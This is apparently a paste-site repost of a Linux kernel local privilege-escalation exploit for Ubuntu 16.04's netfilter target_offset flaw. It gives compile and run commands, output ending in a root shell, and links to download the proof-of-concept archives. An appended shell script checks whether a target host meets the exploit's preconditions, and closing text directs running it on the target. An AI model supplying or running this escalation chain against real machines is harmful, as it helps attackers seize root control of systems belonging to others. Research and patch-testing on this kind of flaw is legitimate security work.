blogfakessh

#exploit

Jul 19th, 2016
Source: https://twitter.com/vnik5287/status/748843859065483264

/**
 * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
 * check_compat_entry_size_and_hooks/check_entry
 *
 * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
 *
 * Vitaly Nikolenko
 * vnik@cyseclabs.com
 * 23/04/2016
 *
 *
 * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
 * automatic loading).
 *
 * vnik@ubuntu:~$ uname -a
 * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
 * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
 * vnik@ubuntu:~$ ./decr
 * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
 * [!] Decrementing the refcount. This may take a while...
 * [!] Wait for the "Done" message (even if you'll get the prompt back).
 * vnik@ubuntu:~$ [+] Done! Now run ./pwn
 *
 * vnik@ubuntu:~$ ./pwn
 * [+] Escalating privs...
 * root@ubuntu:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * root@ubuntu:~#
 *
 */

Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
https://cyseclabs.com/exploits/target_offset_vnik.zip
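The header above states two preconditions for this exploit: ip_tables.ko must be loaded (an `iptables -L` as root autoloads it) and the offsets were tested on kernel 4.4.0-21-generic. The script below is an added example, not part of vnik's exploit package or the original paste; it checks both preconditions from a /proc/modules-style listing and a `uname -r` string. The function names, the `--live` flag and the two sample module listings are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example (not part of the original exploit): check the preconditions
# stated in the exploit header -- ip_tables loaded and the tested kernel
# release -- against a /proc/modules-format file and a release string.
# File and release are parameters so the checks also run on constructed input.

TESTED_RELEASE="4.4.0-21-generic"   # release the header says the exploit was tested on

# ipt_loaded FILE: return 0 if FILE (format of /proc/modules) lists ip_tables.
ipt_loaded() {
    awk 'BEGIN { found = 1 } $1 == "ip_tables" { found = 0 } END { exit found }' "$1"
}

# release_matches RELEASE: return 0 if RELEASE equals the tested release.
release_matches() {
    [ "$1" = "$TESTED_RELEASE" ]
}

# check_host MODULES_FILE RELEASE: print a verdict per precondition and
# return 0 only when both hold, 1 otherwise.
check_host() {
    mods="$1"; rel="$2"; rc=0
    if ipt_loaded "$mods"; then
        echo "[+] ip_tables is loaded"
    else
        echo "[-] ip_tables not loaded (iptables -L as root would autoload it)"
        rc=1
    fi
    if release_matches "$rel"; then
        echo "[+] kernel $rel matches the tested release"
    else
        echo "[-] kernel $rel is not $TESTED_RELEASE; the exploit's offsets may not apply"
        rc=1
    fi
    return $rc
}

# Constructed sample listings in /proc/modules format (not captured from a real host).
SAMPLE_LOADED=$(mktemp)
SAMPLE_NOT_LOADED=$(mktemp)
trap 'rm -f "$SAMPLE_LOADED" "$SAMPLE_NOT_LOADED"' EXIT
cat > "$SAMPLE_LOADED" <<'EOF'
ip_tables 28672 1 iptable_filter, Live 0x0000000000000000
x_tables 36864 2 ip_tables,iptable_filter, Live 0x0000000000000000
EOF
cat > "$SAMPLE_NOT_LOADED" <<'EOF'
x_tables 36864 0 - Live 0x0000000000000000
EOF

# Run against the live system only when invoked with --live (hypothetical flag).
if [ "${1:-}" = "--live" ]; then
    check_host /proc/modules "$(uname -r)"
fi
```

Run it with `sh check.sh --live` on the target; a "[-]" line for ip_tables means the OOB path is not yet reachable until the module is loaded, and a release mismatch means the hard-coded offsets in the PoC should not be trusted without re-checking them.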